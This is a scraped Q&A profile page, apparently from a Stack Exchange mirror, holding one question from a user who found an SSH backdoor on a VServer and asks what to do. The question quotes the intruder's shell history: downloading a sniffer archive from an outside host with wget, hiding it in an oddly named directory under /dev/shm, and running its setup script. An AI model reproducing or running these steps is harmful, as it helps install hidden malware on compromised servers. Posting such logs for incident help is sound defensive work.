小编its*_*ajo的帖子

在 VServer 上发现 SSH 后门。该怎么办？

昨天我检查了我的 VServer 上的命令历史记录。我发现了几条可疑的线路。

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd …

Run Code Online (Sandbox Code Playgroud)

ssh security malware

its*_*ajo

2018 03-06

24
推荐指数

1
解决办法

6501
查看次数

标签统计

malware ×1

security ×1

ssh ×1

在 VServer 上发现 SSH 后门。该怎么办？

标签 统计

小编its_ajo的帖子

标签统计